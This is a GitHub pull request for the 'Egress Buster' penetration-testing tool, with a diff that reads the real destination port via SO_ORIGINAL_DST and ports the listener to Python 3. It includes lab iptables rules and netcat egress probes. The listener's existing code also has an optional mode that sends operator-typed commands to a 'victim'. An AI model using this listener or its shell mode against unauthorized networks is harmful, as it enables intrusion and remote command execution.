### PR TITLE
SO_ORIGINAL_DST to get TCP port instead of relying on client

### DIFF
--- a/egress_listener.py
+++ b/egress_listener.py
@@ -6,15 +6,21 @@
 #
 # Listener can only be run on Linux due to iptables support.
 #
-import SocketServer
+try:
+    import SocketServer
+except ImportError:
+    import socketserver as SocketServer
 import subprocess
 import sys
 import threading
 import time
+import socket
+import struct
+
+SO_ORIGINAL_DST = 80
 
 # define empty variable
 shell = ""
-port = 1090
 running = True
 
 # assign arg params
@@ -24,7 +30,7 @@ try:
 
 # if we didnt put anything in args
 except IndexError:
-    print """
+    print("""
 Egress Buster v0.2 - Find open ports inside a network
 
 This will route all ports to a local port and listen on every port. This
@@ -37,7 +43,7 @@ Arguments: local listening ip, eth interface for listener, optional flag for she
 Usage: $ python egress_listener.py <your_local_ip_addr> <eth_interface_for_listener> <optional_do_you_want_a_shell>
 
 Example: $ python egress_listener.py 192.168.13.10 eth0 shell
-        """
+        """)
     sys.exit()
 
 # assign shell
@@ -51,8 +57,12 @@ except:
 class ThreadedTCPRequestHandler(SocketServer.BaseRequestHandler):
     # handle the packet
     def handle(self):
+        port = struct.unpack(
+            '!HHBBBB',
+            self.request.getsockopt(socket.SOL_IP, SO_ORIGINAL_DST, 16)[:8]
+        )[1]  # (proto, port, IPa, IPb, IPc, IPd)
         self.data = self.request.recv(1024).strip()
-        print "[*] Connected from %s on port: TCP %s" % (self.client_address[0], self.data)
+        print("[*] Connected from %s on port: TCP %d (client reported %s)" % (self.client_address[0], port, self.data))
         if shell == "shell":
             while running:
                 request = raw_input("Enter the command to send to the victim: ")
@@ -62,7 +72,7 @@ class ThreadedTCPRequestHandler(SocketServer.BaseRequestHandler):
                         break
                     try:
                         self.data = self.request.recv(1024).strip()
-                        print self.data
+                        print(self.data)
                     except:
                         pass
         return
@@ -74,27 +84,30 @@ class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer): pa
 if __name__ == "__main__":
 
     try:
-        print "[*] Inserting iptables rule to redirect **all TCP ports** to port TCP %s" % port
-        subprocess.Popen(
-            " iptables -t nat -A PREROUTING -i %s -p tcp  --dport 1:65535 -j DNAT --to-destination %s:%s" % (
-            eth, ipaddr, port), shell=True).wait()
         # threaded server to handle multiple TCP connections
-        socketserver = ThreadedTCPServer(('', port), ThreadedTCPRequestHandler)
+        socketserver = ThreadedTCPServer(('', 0), ThreadedTCPRequestHandler)
         socketserver_thread = threading.Thread(target=socketserver.serve_forever)
         socketserver_thread.setDaemon(True)
         socketserver_thread.start()
-        print "[*] Listening on all TCP ports now... Press control-c when finished."
+        port = socketserver.server_address[1]
+        print("[*] Inserting iptables rule to redirect **all TCP ports** to port TCP %s" % port)
+        ret = subprocess.Popen(
+            "iptables -t nat -A PREROUTING -i %s -p tcp  --dport 1:65535 -j DNAT --to-destination %s:%s" % (
+            eth, ipaddr, port), shell=True).wait()
+        if ret != 0:
+            raise Exception('failed to set iptables rule (code %d), aborting' % ret)
+        print("[*] Listening on all TCP ports now... Press control-c when finished.")
 
         while running:
             time.sleep(1)
 
     except KeyboardInterrupt:
         running = False
-    except Exception, e:
-        print "[!] An issue occurred. Error: " + str(e)
+    except Exception as e:
+        print("[!] An issue occurred. Error: " + str(e))
     finally:
-        print "\n[*] Exiting, flushing iptables to remove entries."
-        subprocess.Popen("iptables -t nat -F", shell=True).wait()
+        print("\n[*] Exiting, flushing iptables to remove entries.")
+        subprocess.Popen("iptables -t nat -F PREROUTING", shell=True).wait()
 
-    print "[*] Done"
+    print("[*] Done")
     sys.exit()


### PR DESCRIPTION
I recently used egressbuster for the first time during a pentest but my file transfer channel to the target (Windows) machine was really slow.
There was no python there and uploading the 4mg .exe was too much.
But I could use _powershell_ or _netcat_ to try to connect.

My example would be:

_target_ outbound firewall (192.168.1.68 is the _attacker_):

```
iptables -A OUTPUT -p tcp --dport 25 -j ACCEPT
iptables -A OUTPUT -p tcp --dport 30 -j ACCEPT
iptables -A OUTPUT -p tcp -d 192.168.1.68 -j REJECT
```

Running _netcat_ on the _target_:

```
root@egress-target:~/egressbuster# nc -nz 192.168.1.68 25-30
root@egress-target:~/egressbuster# 
```

The _listener_ output:

```
root@egress-attacker:~/egressbuster# ./egress_listener.py 192.168.1.68 eth0
[*] Inserting iptables rule to redirect **all TCP ports** to port TCP 1090
[*] Listening on all TCP ports now... Press control-c when finished.
[*] Connected from 192.168.1.70 on port: TCP 
[*] Connected from 192.168.1.70 on port: TCP 
```

Of course I could do something like (converted to Windows scripting, whatever that is :)):

```
root@egress-target:~/egressbuster# for i in $(seq 25 30); do echo $i | nc -n 192.168.1.68 $i; done
(UNKNOWN) [192.168.1.68] 26 (?) : Connection refused
(UNKNOWN) [192.168.1.68] 27 (?) : Connection refused
(UNKNOWN) [192.168.1.68] 28 (?) : Connection refused
(UNKNOWN) [192.168.1.68] 29 (?) : Connection refused
```

```
root@egress-attacker:~/egressbuster# ./egress_listener.py 192.168.1.68 eth0
[*] Inserting iptables rule to redirect **all TCP ports** to port TCP 1090
[*] Listening on all TCP ports now... Press control-c when finished.
[*] Connected from 192.168.1.70 on port: TCP 25
[*] Connected from 192.168.1.70 on port: TCP 30
```

But where's the fun in that if there's room for improvement on the listener side? :)

So, after this patch, we have:

```
root@egress-attacker:~/egressbuster# ./egress_listener.py 192.168.1.68 eth0
[*] Inserting iptables rule to redirect **all TCP ports** to port TCP 59950
[*] Listening on all TCP ports now... Press control-c when finished.
[*] Connected from 192.168.1.70 on port: TCP 30 (client reported )
[*] Connected from 192.168.1.70 on port: TCP 25 (client reported )
[*] Connected from 192.168.1.70 on port: TCP 25 (client reported 25)
[*] Connected from 192.168.1.70 on port: TCP 30 (client reported 30)
```

For the _target_ commands:

```
root@egress-target:~/egressbuster# nc -nz 192.168.1.68 25-30
root@egress-target:~/egressbuster# ./egressbuster.py 192.168.1.68 25-30
[i] Sending packets to egress listener (192.168.1.68)...
[i] Starting at: TCP 25, ending at: TCP 30
[*] Connection made to 192.168.1.68 on port: TCP 25
[*] Connection made to 192.168.1.68 on port: TCP 30
[*] All packets have been sent
[i] Remaining threads: 4
[*] Done
```

Nothing broken and something improved!

Also, updated _print_, _except_ syntax and added a check to _import SocketServer_ to support python3 in the listener. I have no idea who uses p3 but the changes were so little, why not?

Also added validation to the _iptables_ command and dynamic listening port as it doesn't really matter which one it is :)

If you find this PR with too many changes you don't, just let me know and I'll break it down!

I'm thinking of updating it to support non-root (and/or no iptables) mode (actually starting a SocketServer on every possible port, reporting the ones in use). I find that useful as well for situations where we don't have root on a pivot machine, if it is a non-iptables system, or simply if we don't want the iptables rule to disrupt ports already in use..
